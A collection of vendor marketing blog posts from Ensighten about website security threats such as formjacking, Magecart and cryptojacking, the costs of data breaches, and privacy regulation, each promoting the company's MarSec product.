Why marketing security is your first line of defense against data leaks
Your website is one of your business’ most valuable assets. It not only provides a powerful tool for engagement with customers – and potential customers – it is a powerful marketing platform and a source of data into user behavior, preferences and Personally Identifiable Information (PII).
For a marketer, the more data you can gather on visitors to your website, the better you can craft campaigns and target individuals. Moreover, you may be entrusted with sensitive customer data such as names, addresses, credit card details, passwords and other personal information.
The massive threat of data loss
With the volume and value of customer data under the spotlight, the risk of data loss and data leaks looms large. Unfortunately, in 2019 all enterprises that collect data online are still vulnerable to cyberattack. The threat is now so prevalent that in its Global Risks Report, the World Economic Forum (WEF) recently put large scale cyberattacks as the fifth biggest threat facing our world today, ranking only three places down from climate change.
In addition, 82 percent of companies that the WEF questioned believe the risk of cyber-attacks leading to data theft and data leakage will increase in 2019.
Elsewhere, the 2019 Thales Data Threat Report – Global Edition says 60 percent of organizations globally have already experienced a data breach at some point in their history, with 30 percent experiencing a breach within the past year alone. The US had the highest number of data breaches of all breaches globally in the last three years (65 percent) as well as in the last year (36 percent).
What are the threats to your website?
While much of the current talk around the importance of cybersecurity focuses on securing the company network, some of the biggest breaches in recent years have occurred after an organization’s website was compromised, leading to valuable data being stolen. This is due, in part, to websites – and website security – falling under the remit of the marketing department as opposed to the IT team and website secuirty not being something marketing departments are tasked with solving. This is an oversight that cyber criminals can readily exploit.
It is vital that all businesses are aware of the vulnerabilities across their marketing platforms and can prevent or mitigate risk effectively.
We’ve all heard how criminals can use a device to ‘skim’ your credit card details from an ATM; formjacking is a web-based equivalent of this. Also called digital payment card skimming (DPCS), hackers inject malicious code onto a website – often through a third-party technology – and harvest customers’ financial information when they make an online purchase.
At the heart of these attacks is a consortium of hackers called Magecart, which in 2018 executed numerous high-profile attacks on the likes of Ticketmaster, along with retailers Newegg, Kitronik and VisionDirect.
The most common type of cyberattack in 2018; cryptojacking sees hackers inject browser-based cryptomining code into a website to illegally mine for cryptocurrencies. This is causing significant problems for any business, as cryptojacking impacts website availability and performance, which can lead to a loss of customer conversion and revenue.
Both formjacking and cryptojacking follows a trend of web-based hacking, meaning the user no longer needs to download malicious software to be impacted by it.
Third-party entry system
For a marketer, third-party tags or code like social media buttons, ad trackers and chatbots are useful for improving and tracking the customer experience, but they can also throw a wide door open to cyberattacks and data leaks.
Fallout of a data breach
At the same time, regulatory pressure and financial penalties are increasing for data loss. The post data-breach fallout may also include business disruption, class-action lawsuits, executive firings, reputational damage and diminished market value of the organization.
However, compliance rates for Payment Card Industry Data Security Standard (PCI DSS) – the standard for organizations that handle branded credit cards – are falling. Verizon’s 2018 Payment Security Report reveals that almost half of organizations assessed were not fully compliant, and that the average number of controls failed rose to the highest level seen since 2012.
What can I do to secure my website from hackers and data leaks?
Ensighten’s website security solution (MarSec) offers real-time control of business and customer data on your website or web properties and apps, to prevent leakages of data and PII. It enables your company to cut through the confusion of third-party suppliers and gain insight into who has access to what customer data. MarSec also ensures that data stays private, secure and that governance is enforced, preventing exposure and risk.
Website Security offers:
Third-party technology control: Whitelist only approved vendors to operate, as well as help manage and update policies in real time
Data Masking and redaction: Mask or redact sensitive data strings
Client-side security control: Extends protection beyond the company network to potential vulnerable areas that can be overlooked
Why the long-term effects of a data breach on your business can be catastrophic
Billions of personal records are lost or stolen every year, either through cyberattack or simple data mismanagement. In 2018 some of the biggest names in government, technology, healthcare, travel and hospitality suffered data losses.
At the same time, data privacy has never been more important; companies are now subject to intense scrutiny from regulators as to how they handle, store and secure their customers’ personally identifiable information (PII) and data.
The most recent Cost of a Data Breach Study by The Ponemon Institute shows that the cost of a data breach is snowballing, with more records being lost or stolen every year. Here are the stats:
Average total cost of a data breach: $3.86 million
Average total one-year cost increase: 6.4 percent
Average cost per lost or stolen record: $148
One-year increase in per capita cost: 4.8 percent
Likelihood of a recurring material breach over the next two years: 27.9 percent
Average cost savings with an Incident Response team: $14 per record
How can you work out the cost of a data breach?
The cost of a data breach covers detection, escalation, notification, and any activities an organization must undertake following an incident, including working to repair their reputation. Here are the most common outlays following a breach.
Detection and escalation of a data breach
This is the cost occurred at ground zero – as soon as a breach is detected. Once an organization detects a breach or loss of data, they must report it within a specified time-frame.
For this they may need to implement forensic and investigative activities, assessment and audit services, crisis-team management, as well as communicating the problem to management and the board of directors.
The problem is that data loss can remain undetected for months after the original attack. The Ponemon study shows that the average time taken to identify a breach was 197 days in 2018, and the average time to contain it was 69 days.
However, it can take much longer to locate a data leak – last month it came to light that 42,000 patients in Florida had their personal and health information exposed in a breach that lasted 16 months.
Post data breach response
These are the costs associated with communicating with individuals affected by the data leak, as well as costs associated with reparation with customers and regulators.
For example, any help desk activities or inbound communications, credit report monitoring and identity protection services, as well as issuing new accounts or credit cards, legal expenses and regulatory fines. (This can come in the form of subsequent legal action – see the Wendy’s data breach, below.)
Post-breach, organizations must notify the individuals who had their data compromised via email, letters, outbound telephone calls, or by general notice. They also need to as communicate with regulators and perhaps engage outside experts.
It is vital that organizations get this right. Under GDPR, organizations have 72 hours to disclose any data breaches to the relevant authorities, as well as the victim of the breach. The penalty for failing to notify them is €10 million, or two percent of revenues.
In addition to these initial expenses, some of the most dramatic long-term ramifications of a data breach or data leak occur in the weeks, months and even years following an incident.
Lost business following a data leak
Initial costs of lost business might include business disruption and system downtime. However, data breaches will also result in the long-term loss of customers, reputation and goodwill. Forty-one percent of British consumers and 21 percent of US consumers said they will stop spending with a business or brand forever following a data security breach. This type of reputation damage can be difficult to repair.
Ponemon says that organizations that lost less than one percent of their customers due to a data breach saw an average loss of $2.8 million in 2018. If four percent or more was lost, the average lost was $6 million, a difference of $3.2 million.
Data loss also means organizations leave themselves open to legal action. Wendy’s recently settled a $50 million lawsuit after cybercriminals targeted 1,025 of its point-of-sale systems with malware, leading to the loss of massive quantities of payment card data. After a consumer class-action lawsuit which it settled for $3.4 million, Wendy’s agreed to pay out $50 million to compensate affected card issuers for breach-related losses and expenses, such as the cost of reissuing cards and compensating cardholders for fraud losses.
Regulatory penalties following data breaches
Under GDPR, organizations can be fined up to four percent of annual global turnover or €20 million, whichever is greater, if they fail to comply with the regulation.
In the US there are also efforts to introduce data privacy regulations at state level – with the likes of the California Consumer Privacy Act (CCPA) – and at federal level with the US Senate examining how lawmakers can protect consumer privacy.
In real terms, a company can literally lose its value following a data breach. A multi-year study by Comparitech published in 2018 shows that data breaches have an impact on a company’s share price. The study’s authors said that the impact of data breaches “likely diminished over time, but the damage was still visible in the stock’s NASDAQ performance indicator even after three years, in some cases”. The following impacts were recorded.
Share prices of breached companies hit a low point approximately 14 market days following a breach
Finance and payment companies saw the largest drop in share price performance following a breach
Breaches that leak highly sensitive information like credit card information and social security numbers see larger drops in share price performance on average than companies that leak less sensitive info
Third party problem in data breaches
A reported 59 percent of companies say they have experienced a data breach caused by one of their vendors or third parties. More worryingly, many of these types of breaches go undetected: 22 percent of respondents to a late 2018 survey by Opus and Ponemon admitted they didn’t know if they’d had a third-party data breach in the past 12 months.
Furthermore, only 37 percent indicate they have sufficient resources to manage third-party relationships and only 35 percent rate their third-party risk management program as highly effective.
Considering the wide ecosystem of third party vendors in today’s modern IT environment – particularly those with access to vital business resources like the company website – organizations must have a complete view of which third parties have access to what sensitive data, and how they are using it. Having a formal monitoring and tracking process in place for third parties will protect against potential data leakage and help defend your organization from a costly data breach incident.
How to guard against data breaches
The fact is that no organization that suffers a data breach will escape without either serious long-term financial or reputational damage.
It is therefore impossible to overestimate the importance of securing data, be it corporate or personal, for which you are liable – the potential short and long-term damage you can suffer otherwise is almost incalculable.
Importantly, there is a direct correlation between how quickly an organization can identify and contain data breach incidents and the severity of the financial consequences – companies that contained a breach in less than 30 days saved more than $1 million versus those that took longer.
When it comes to data leaks, prevention is better than a cure; investing in a comprehensive data privacy solution now could save your company millions in lost business and regulatory penalties. Speak to Ensighten about how to gain an insight to your data, any third party vulnerabilities or potential breaches to ensure you maintain regulatory compliance and keep your business up and running.
With all the hype around artificial intelligence (AI), should there be more focus on getting the fundamentals of security right first?
There’s no escaping the buzz around artificial intelligence (AI). Along with other emerging technologies such as machine learning (ML) and Robotic Process Automation (RPA), it is being touted as a game-changer for businesses.
AI is increasingly present in devices, applications and services throughout any organization with a digital offering. But nowhere has AI’s potential for disruption been more evident than in cybersecurity, with the technology quickly gaining traction within enterprise businesses – particularly around automated threat prevention, detection and response.
It is an increasingly popular option as it enables businesses to be more proactive in their defence strategies and detect more threats before they can do serious damage to their organization or their web security. One study published in January 2019 shows that 86 percent of businesses have explored Machine Learning and Artificial Intelligence solutions, with almost half (48 percent) pointing to quicker response times and better web security as their primary drivers.
Fighting fire with fire
Nevertheless, for every company leveraging AI cybersecurity within their website security strategy, you can be certain that criminals will be using that same technology to launch increasingly sophisticated attacks of their own.
Criminals can leverage AI to:
Automate attacks and improve evasion capabilities against detection systems
Increase the scale and reach of the threats
Improve current digital attack tools to make them more harmful and difficult to detect
Automatically breach defences and generate more sophisticated phishing attacks from information scraped from websites
According to a recent report by Riot Research, “an arms race will develop around Artificial Intelligence and Machine Learning as major cybercriminal gangs and rogue nation states adopt these to launch increasingly sophisticated cyberattacks, pushing spending on countermeasures.”
No magic bullet
CIOs questioned for Gartner’s 2019 CIO Agenda, predicted AI would be the most disruptive technology for their businesses. Thirty-seven percent responded that they have already deployed AI technology or that deployment was in short-term planning. In terms of implementation, AI came in second place – behind cybersecurity.
What we can take from this is that there is great potential for the application of Artificial Intelligence security and other disruptive technologies within the realm of cybersecurity. But it is important to remember that these technologies don’t work in isolation, and they are not a ‘magic bullet’ for your cybersecurity needs.
Multi-layered approach to website and data security
Next-generation technologies such as AI should be implemented in tandem with other website security solutions, because, while cyberattacks today are increasingly complex and targeted, it is still important organizations don’t overlook some of the most common attack vectors.
Many of these attacks on websites take advantage of third-party technologies which run on the sites, providing a backdoor, through which criminals can access your customers’ personal and payment data. Even with this in mind, 67 percent of organizations are yet to implement marketing security for their website, putting both their customers and the future of their business at risk.
With the many advances being made with new disruptive technologies like AI it is important to invest in getting the fundamentals right, which means including marketing security as part of your holistic approach to cyber defense. Get in contact to learn more.
With formjacking incidents on the rise, is your website leaving your customers vulnerable to data theft?
2018 saw a sharp rise in incidents of web skimming and formjacking, a method used by cybercriminals to steal visitors’ credit card details and other personal information from the payment forms on the checkout pages of e-commerce websites.
Another study also published by Symantec; 2019 Internet Security Threat Report, shows that 4,818 unique websites were compromised via formjacking code every month in 2018. The appeal of formjacking for criminals is linked to the value of customers’ credit card information – data from a single credit card can be worth up to $45 (£34) on underground markets. Just 10 credit cards stolen from compromised websites could result in a yield of up to $2.2 million (£1.66 million) for cybercriminals each month.
Most wanted: What is Magecart?
At the forefront of these campaigns is a consortium of hackers called Magecart. In 2018 the group executed formjacking-based attacks on several high-profile victims including Ticketmaster, as well as retailers Newegg, Kitronik and VisionDirect.
RiskIQ, which has led the research into Magecart’s activities, says the group is placing digital credit card skimmers on compromised e-commerce sites “at an unprecedented rate and with frightening success.”
In a typical data breach, criminals break into company servers and access databases to steal confidential corporate and employee information that can include passwords, email addresses, phone numbers, and maybe even financial information and intellectual property. This is done by exploiting flaws in website security measures.
But, under the Payment Card Industry’s Data Security Standard (PCI DSS), merchants are prevented from storing full payment card information, such as personal CVV security code. What makes Magecart’s attacks so dangerous is that it doesn’t matter that a company hasn’t stored your credit card details. Its malicious script lurks on the client-facing side of a company’s website, waiting to skim off any personal information, like a CVV code, that’s entered by customers when they check out. This is also known as a data leak, as the hackers are stealing the information as it is inserted, rather than from the business’s servers.
Supply chain attacks
RiskIQ notes that the ‘The Global Attack Surface’ is growing every day. For example, modern websites are made up of many different elements—the underlying operating system, frameworks, third-party applications, plug-ins, trackers – all designed to deliver a user experience that people have come to expect, as well as reduce the time to market and derive maximum value from user interactions.
However, this commonality of approach is attractive to criminals as a successful exploit written for a vulnerability or exposure on one site can be reused across many sites, creating a threat to multiple website security measures.
In numerous cases, Magecart has targeted third-party website vendors used in the supply chain in order to inject its code onto websites. In the case of Ticketmaster, Magecart compromised a third-party chatbot, which loaded malicious code into the web browsers of visitors to Ticketmaster’s website, with the aim of harvesting customers’ payment data.
In addition, third-party vendors supply code integrates with thousands of websites, so when it’s compromised, the websites of all of the customers that use it are compromised, giving Magecart access to a wide range of victims at once.
Secure your website
This growing attack surface means that while cybersecurity solutions are often deployed on an organization’s networks or servers, its website is highly susceptible to attack. As a unique point of vulnerability for customers inputting credit card data at the source, it shouldn’t be overlooked.
Formjacking, or web skimming is on the rise, therefore it is crucial that you ensure your website is secure. As well as observing and monitoring site traffic and testing any new updates to detect any suspicious behaviour, a key part of website security and mitigating any threat from third-party vendors by creating a whitelist or blacklist that ensures you only share data with trusted vendors.
Don’t risk becoming the Magecart’s next victim. Speak to Ensighten about how our marketing security solution will enable you to manage all your third-party vendor technologies and prevent unauthorized data collection.
Ensighten will be highlighting the importance of web security at the world’s biggest InfoSec event, RSA Conference 2019
In 2019, there’s not a department or function within an organization that isn’t shaped in some way by the need for cybersecurity. Barely a week passes when we don’t hear of another high-profile company or government agency that has fallen victim to cybercrime – whether it’s a ransomware attack, phishing campaign, cryptojacking, or any number of sophisticated new threats waiting to be unleashed on the enterprise and undermine its website security.
Companies are waking up to the long-term financial and reputational damage that a cyberattack can inflict. Conversations about website security can be heard throughout every aspect of the enterprise – including the boardroom where business leaders are giving the green light to greater IT security spending in line with the perceived risks associated with data loss. New research claims the $162 billion (£123 billion) spent on cybersecurity in 2018 will jump by an astounding $1,105 billion (£837 billion) during 2019, driven by adherence to GDPR and other data privacy regulations such as CCPA, which is due to come into action in January 2020.
Due to this heightened awareness around cybersecurity, the RSA Conference 2019 in San Francisco has never been more relevant to the modern enterprise. As the world’s biggest information security (InfoSec) event, it draws more than 50,000 attendees per year, providing a platform for both cybersecurity leaders and new industry voices, advocating for next generation technologies that can go toe-to-toe with today’s increasingly complex cybercrime threats.
Ensighten will be one of those voices at RSA Conference, showcasing the need for next generation website security for the enterprise. The last 12 months have seen several high-profile incidents where global organizations’ websites were targeted by cybercriminals, including The Make-a-Wish Foundation, Ticketmaster, ABS-CBN and Newegg.
Website security: Why is it so important?
Website breaches can be disastrous for any organization, and can even prove terminal if customers’ credit card, passport or other Personally Identifiable Information (PII) is stolen. Not only do they face public scrutiny and potentially huge fines imposed by the appropriate regulatory bodies, but they may take a bigger hit if confronted by unhappy investors, decreasing market value or desertion by customers who can no longer trust them to keep their personal information secure.
Despite this, our own research indicates that only 30 percent of enterprises are completely prepared in the event of a website breach. In many instances, organizations may not even by aware of the threat posed, as hackers use third-party vendors to gain entry to their websites. It is imperative to us that organizations understand the enormous risks they are taking with their business and their reputation if they aren’t taking every precaution to secure their website supply chain.
Ensighten at the RSA Conference 2019
At the RSA Conference we will be demonstrating our leading website security solution which protects businesses against malicious attacks and data loss.
Alongside this, we know that marketing security is also still slipping under some organizations’ radar. We will be talking to InfoSec professionals about why it is essential to stop criminals getting their hands on all the customer data that their businesses acquire for campaigns and other marketing projects. Further, we will be presenting our MarSec platform, which manages and controls both the enterprise and customers’ data on a website in real-time to prevent data leaks and loss of PII.
The theme of this year’s RSA Conference is ‘Better’. It implores everyone “from the C suite to those of us on the front lines” to do better when it comes to creating a better, more secure world. That’s exactly our goal with our next-generation website security solution.
As RSA explains: “We come here to experience better solutions, brainstorm better ideas, and remind ourselves that a better, safer world is ahead.” Ian Wooley, CRO, Ensighten.
In this current era of digital transformation, your website as a digital platform has never been more important to your business. Websites are evolving to offer cross-channel, personalized and user-centric web experiences to match increasingly high customer expectations.
Yet despite significant investment from companies into getting the look, feel, and user experience right on their websites, many fail to address perhaps the most important aspect: website security.
It seems incongruous that despite being a highly-valued entry point for customer interaction and a repository for a wealth of personal and financial customer data, the front end – or the client-side – is considered the most vulnerable part of a website. As such, it is often targeted by hackers looking to steal valuable customer data.
There have been some high-profile examples of this type of cybercrime, most notably the use of ‘skimming code’ – otherwise known as digital payment card skimming (DPCS) or formjacking – by criminals to scrape website users’ credit card details and other information from payment forms when they are completing an online purchase. They will then use those stolen details to perform payment card fraud or sell them to other criminals on the dark web.
Pertinently, PCI compliance prevents customers from storing their three-digit credit card security code on a website’s servers, so it makes sense for hackers to focus their efforts on the client-side of the website, to capture those details as they are entered.
The most notable attacks of this kind have been carried out by a collection of cybercrime groups known as Magecart, who were reportedly responsible for at least 319,000 cyber incidents in 2018. For example, Magecart targeted online retailer Newegg by injecting 15 lines of skimming code on its payments page, which remained undetected for more than a month during the summer or 2018. The code siphoned off credit card data from unsuspecting customers to a server controlled by the hackers with a similar domain name. The server even reportedly used an HTTPS certificate to avoid suspicion.
The group exploited another client-side website security vulnerability in its 2018 attack on Ticketmaster UK, compromising a chatbot originating from a third-party customer support company. While third-party vendors like social media buttons, ad trackers and chatbots increase the functionality of your website and improve the customer experience, they can also be a security blind spot if you do not have the correct cyber security measures in place.
This is compounded by the fact that there can be malicious changes to the code base that can occur entirely without your knowledge, unsurprisingly leading to a massive gap in your cyber security measures. Indeed, Ponemon research shows 59 percent of companies say they have experienced a data breach caused by one of their third-parties.
But it’s not just enterprises that need to worry about web security. Governments have a duty to make their webpages accessible to everyone, and as part of this, use plug-ins to read text on the site out loud to blind or partially sighted visitors. One such plug-in, called Browsealoud from Texthelp, was compromised by hackers who altered its source code to inject a crypto mining code into every webpage, affecting more than 4000 government websites around the world.
What can I do to secure my website?
There are products available that can help defend your website from client side attacks – to an extent. A Content Security Policy (CSP) can help prevent cross-site scripting (XSS), clickjacking and other code injection attacks, but there are still gaps in its capabilities, and it can often mean a trade-off between website security and functionality.
In addition, Subresource Integrity (SRI) can check for any code changes in any assets served by a third-party vendor to ensure they haven’t been compromised. However, SRI can struggle to keep up with the regular updates from third-party vendors and frequent changes to source code. The bottom line is that neither are fully effective against attacks in a rapidly evolving threat landscape. Download our guide to learn more.
You need next generation website security to ensure your data security is working and your business is safe. Ensighten can help you protect any and all client-side data against all the threats we’ve discussed. Our MarSec solution provides you with a real-time view of all the technologies running on your website and perform a full privacy risk assessment as web pages are loaded. It can also prevent malicious web injects by only loading resources that are explicitly whitelisted, and block everything else.
As we’ve seen with just these few examples of client-side attacks, you can no longer overlook or dismiss the potential vulnerabilities within your website. The time to secure your website and your customer data is now.
A home to hackers, the dark web means it has never been easier to target personal and customer data
2018 saw criminals once again target organizations – of all sizes, and across industries and market sectors – with a series of cyberattacks that continues to escalate in complexity, scale and frequency. Many of these attacks were launched with one goal in mind: stealing data.
Data is a valuable, and much-sought after currency in today’s digital world. Whether its confidential company information like banking details, employee records, Intellectual Property (IP) documents, the credit card details, logins or Personally Identifiable Information (PII) of customers, all stolen data has a value to the thieves, which is why data protection should be a top priority for any business.
The dark corner of the internet – what is the dark web?
The increase in data theft is fuelled, in no small part, by the dark web. Where criminals would once fence their stolen goods via a network of shady contacts, this dark corner of the internet does much the same job. Operating under the anonymity afforded by trading in cryptocurrencies, the dark web is where data is bought and sold for a price. The dark web is often confused with the deep web, however the two are different. The deep web refers to the entire internet – most of which is not indexed and therefore won’t appear on search engines. The dark web specifically refers to the criminal activity taking place on this unindexed portion of the internet.
The data varies in value. For example, personal information that cannot be changed as easily as a credit card or bank account reportedly is highly valuable to cybercriminals and drives a high price on the dark web.
However, the dark web isn’t just a place to buy or sell stolen data; it also promotes and enables cyberattacks by making hacking tools easily and cheaply available to anyone with a laptop, making it a threat to all web security. 2018 research by Virtual Private Network (VPN) comparison service Top10VPN.com, showed that fraudsters can access hacking tools on the dark web for the cost of a cheap takeaway coffee.
Entry-level hacking tools, such as ready-made phishing pages, software to compromise Wi-Fi networks and files to help hack passwords all go for less than $3.95 (£3) on the dark web. But even comprehensive hacking toolkits be picked up for around $130 (£99), according to the research.
Coupled with the availability of how-to guides on the dark web – meaning rookie hackers need no prior knowledge of web security or on how to carry out attacks – the report notes that there’s a ”real concern that online fraud could be becoming more commonplace.”
“The perception that hacks are purely the territory of techy bedroom warriors or organizations like Anonymous is increasingly a thing of the past – and all consumers need to be aware of that,” it explains.
Hacking for beginners
Many experts believe this situation will only get worse. Individuals won’t have to belong to a well-known hacking group like Magecart, which was responsible for stealing customer data from Ticketmaster UK last year among other high-profile breaches, to be able to launch a successful attack on an organization by exploiting flaws in their web security.
As we’ve seen from the headlines, the fallout of a data breach can be devastating. While it varies considerably based on things like location, industry, compliance considerations, third-party involvement, insurance protection, etc., the 2018 Cost of Data Breach Study from the Ponemon Institute, sponsored by IBM, puts the average cost of a data breach in the United States at $7.91 million (£6.1 million).
Some more shocking statistics: the average time to identify a breach was 197 days, and the average time to contain a data breach once identified was 69 days. However, companies who contained a breach in less than 30 days saved over $1 million (£760,000) compared to those that took more than 30 days.
Protect your website
One area of the business that’s frequently targeted by hackers is the company website, often a goldmine of customer data. The good news is, there are several ways to safeguard this data and prevent a breach.
Another vulnerability often exploited by groups like Magecart stems from the use of third-party vendors on your website, which hackers can use as an entry point to your organization, compromising your website security. MarSec can help you manage third party technologies by whitelisting approved vendors and managing and updating policies in real time.
With the dark web’s law of supply and demand powering cybercrime from behind the scenes, it has never been more important to ensure your organization is protected from a crippling data breach.
Attacks on web applications account for 40 percent of cyberattacks – how secure is your website?
Your website is one of your most valuable assets. For your customers it can act as a shop window to your products and services, a source of valuable company information, or a full retail trading platform.
For your organization, your website is invaluable for generating new business and providing insight into visitor behavior and preferences. However, this also makes your website a prime target for attack by cybercriminals looking to harvest company and customer data. In this post we’ll explain what website security is, why it is so important and how you can go about ensuring your site is protected.
What is website security?
There are several common attack methods that criminals employ when targeting company websites.
One method is to leverage third party technologies to sneak in ‘the back door’ to your website. These services provide value to visitors’ engagement with your website in the form of live chat bots, social media buttons, or advertisements. The problem is that third-party vendors can often make changes to their scripts without any permission from your website, creating a security blind spot which hackers can exploit while your security and IT teams may be completely unaware of the problem.
Attacks can also be carried out by modifying the DOM environment in your site’s browser – with the vulnerability in the client-side code rather than server-side, this type of attack is harder to detect, as the server never gets a chance to see the attack taking place.
Here are a few examples of other automated threats to web applications:
Scraping and Data Theft: Hackers use bots try to access restricted areas in web applications to get a hold of sensitive data such as access credentials, payment information and intellectual property (IP).
Performance: Bots can impact the availability of a website, bringing it to a complete or partial denial-of-service state.
Spammers and Malware Downloaders: Targeting mobile and web applications, criminals use sophisticated techniques like spoofing their IPs, mimicking user behavior, and abusing open-source to bypass CAPTCHA, challenges and other security heuristics.
The dangers of Laissez-Faire attitudes to web security
What’s worrying is an apparent lack of awareness or responsibility when it comes to cyber security, even among the most popular websites. Research by WatchGuard shows 6.8 percent of the top 100,000 websites use insecure SSL protocols, and 20.9 percent do not use web encryption at all, leaving fully open to data interception or man-in-the-middle (MitM) attacks.
One recent example of inadequate website security is the Nova Scotia government, which has been criticised for “poor overall project management” and a “serious failure of due diligence” after a series of data breaches to one of its websites exposed 7,000 documents containing citizens’ personal information.
The information and privacy officer for the region has recommended the government conducts an inventory of technology solutions, devices and applications across the government and rate their vulnerabilities while creating a plan to mitigate cybersecurity vulnerabilities.
Unfortunately, this is not an isolated incident. Our research show that 87 percent of enterprise businesses do not review the security of their customer data, indicating an apathetic approach to website security. If exploited, this can have a serious impact on the business, as many organizations have discovered in recent years.
It doesn’t matter if the website is public sector-run, holding data such as social security numbers or medical information, or a retailer that stores their customers’ credit card or bank details – the fallout can be dramatic, and costly.
Understanding the risks of poor website security
Latest figures calculate the average cost of a cyberattack now exceeds $1 million (£780,000), an increase of 52 percent over the past year. Radware’s recently published 2018-2019 Global Application and Network Security Report, says this figure takes into account operational and productivity losses, combined with negative customer experience.
43 percent of firms reported negative customer experiences and reputation loss following a successful attack
37 percent suffered brand reputation loss and one in four lost customers
54 percent reported loss of productivity
Breaking these costs down further, the most common expenses following an attack or data breach include:
Direct costs: Extended labor, investigations, audits, software patches development, etc.
Prevention: Emergency response and disaster recovery plans, hardening endpoints, servers and cloud workloads
The number of organizations under attack from cybercrime is also on the rise. The same report shows that most organizations have experienced some type of attack within the course of a year, with only seven percent claiming not to have experienced an attack at all. Those who reported the highest damage are from retail and high-tech sectors.
Data leakage and information loss remain the biggest concern to more than a third of businesses, followed by service outages
Application-layer attacks cause considerable damage; two-thirds of firms experienced application-layer DoS attacks and 34 percent foresee application vulnerabilities being a major concern in the coming year
More than half reported making changes and updates to their public-facing applications monthly, while the rest made updates more frequently, driving the need for automated security
Website security checks: a necessity
In light of the heightened risks associated with a data breach, consistent monitoring the security of your website is a must. However, it can be difficult to track and manage all your third-party technologies, plus any other technologies that piggy-back on these.
This is where you need a website security solution like our MarSec platform, which enables you to feel confident in your website security posture, while having the flexibility to run your business.
The website security solution also fixes the problem of client-side vulnerabilities by extending protection beyond your company network to other susceptible areas.
With high-profile cyberattacks an increasingly common occurrence, it pays to be proactive in your approach to website security checks, because as we’ve seen, the fallout from a data breach can have catastrophic implications for your business.
What GDPR, CCPA and a heightened focus on data regulation worldwide means for businesses
2018 was a landmark year for data privacy.
Some of the biggest companies in the world fell victim to data breaches, compromising the personal information of millions of people worldwide. Whether through sophisticated cyberattacks, software glitches or the simple mishandling of customer data, the likes of T-Mobile, Quora and Google were among the big names forced to admit they suffered breaches.
Some were repeat victims (or offenders, depending on how you look at it) of data breaches. Facebook suffered several major breaches and incidents that affected more than 100 million of its users in 2018.
It is therefore little wonder that US consumers are increasingly concerned about how their personally identifiable information (PII) is handled. One report by SAS shows that almost three-quarters (73 percent) of consumers said their concern over the privacy of their personal data has increased in the past few years, while another report puts the figure even higher, with almost 88 percent of US consumers harbouring concerns when it comes to the privacy of their PII data online in 2019.
GDPR: a blueprint for the US and the CCPA?
2018 was not only a milestone year in terms of the frequency and scale of cyberattacks; the Global Data Protection Regulation (GDPR) was introduced by the European Union (EU) in May 2018 to not only help regulate against such occurrences, but to put the power back into consumers’ hands when it comes to data privacy.
Now in 2019 the US is set to follow suit. This has started at individual state level with the California Consumer Privacy Act (CCPA), which will take effect in 2020. The act is designed to provide Californian residents with access to any personal information that is being collected about them, and to find out whether their PII is sold or disclosed and to whom – as well as the power to deny the sale if they wish.
Elsewhere Vermont has become the first state to enact a law regulating data brokers who buy and sell personal information.
The move to ensure consumer data privacy rights are also being taken up at federal level with the US Senate holding its first committee meeting in September to examine how lawmakers can protect consumer privacy. Further, in early November the Consumer Data Privacy Act was proposed, a bill that emulates GDPR that would penalize CEOs in addition to the companies.
The incoming regulations reflect increasing demand from US consumers for greater data privacy rights. According to SAS:
83 percent would like the right to tell an organization not to share or sell their personal information
80 percent also want to know where and to whom their data is being sold
73 percent said they would like the right to ask an organization how their data is being used
64 percent would like the right to have their data deleted or erased
GDPR compliance – ignoring it is risky business
Crucially, another recent global survey shows that more than two-thirds of consumers would walk away from an organization if it suffered a data breach where their financial and sensitive information was stolen. Ninety-three percent of those questioned say they would place the blame at the door of the business and would think about acting against them, with retailers, banks and social media sites considered the most ‘at-risk’ offenders when it comes to data breaches and failure to uphold GDPR compliance.
The loss of business and the severity of fines now imposed on organizations following a data leak, alongside the long-lasting financial and reputational damage, mean it is crucial that any company that collects or leverages user data on its website takes every possible precaution to prevent a data breach and ensure they take GDPR compliance seriously.
For example, if you use marketing tags, chat boxes or freeform fields to collect data from visitors to your website, it is your responsibility to protect that data from misuse or theft. Even so early into 2019, Singapore Airlines (SIA) has admitted a software glitch on its website was behind a data breach that affected 285 members of its frequent flyer programme, compromising their personal information including passport and flight details.
The good news is that marketing security (MarSec) solutions enable you to manage your customers’ data on your website and help prevent the data leakage and help safeguard your GDPR compliance efforts. It means that any data collected from your customers can’t be exploited by hackers and cybercriminals.
It doesn’t matter where you are in the world – governments and lawmakers are tightening the net when it comes to data privacy. Speak to Ensighten about how MarSec can help you navigate the new privacy laws and avoid any last-minute scramble to achieve compliance.
In the world of website security, there’s an ever-changing array of threats and technological advancements that come along seemingly every day. One thing’s for sure, the sophistication and scope of attacks will continue to grow, but so will the arsenal of tools webmasters have to defend their website and customer data.
After a year punctuated with high profile data breaches, website security is sure to be an issue at the forefront of every business leader’s mind. But what are some of the most prominent website security trends we expect to see in 2019?
1. The methodology of attackers is changing
In the year ahead, website security experts expect to see a shift in the modus operandi of cybercriminals. Instead of stealing data, as has been done so many times in 2018, attackers will instead threaten to undermine the integrity of the data, with potentially catastrophic effects.
A data integrity attack involves the manipulation of data rather than its theft. In 2016, the World Anti-Doping Agency (WADA) was the victim of this type of attack, when data about famous athletes was not only breached, but it was also manipulated to try and damage the reputations of clean athletes.
The potential damage data integrity attacks can cause is huge. Entire stock markets could be poisoned by manipulated data such as sales figures, which could artificially inflate or deflate the value of a company’s stock. Even infrastructure such as the power grid, traffic lights and the water supply could be at risk.
This type of attack can be particularly damaging because it can have a much longer-term effect on the business. Consumers may no longer trust an organization’s data, which could bring an entire company down. The attacks can also go undetected for years, further increasing the extent of the damage.
2. Multi-factor authentication will become the norm for online transactions
Only using a password to access websites and other online services currently makes life very easy for cybercriminals. Although it may not be welcomed by consumers initially, we expect to see multiple forms or optional authentication methods added to customer logins to boost the security of sites. This will help to provide an additional line of defence against the hugely damaging phishing attacks.
3. Clearer internal understanding of the responsibility for cybersecurity
One of the biggest problems many businesses currently face is failing to assign and communicate responsibility for protecting their websites and data effectively. In a previous blog, we referenced a study by The Ponemon Institute, which found that both IT and Marketing Managers think that responsibility for customer data security lies with the other party. The result is that many sites are left unsecured and open to a potential data breach. In 2019, in response to the high-profile data breaches of 2018, we expect to see more defined responsibility cross-department to ensure that there is someone with ultimate ownership of the company’s marketing security.
4. Protecting against smarter AI
One of the big concerns many businesses have for the year ahead is that hackers will start to leverage artificial intelligence (AI) to find new ways to infiltrate websites and apps at scale. We recently discussed this point in an article that was published on TechRadar Pro.
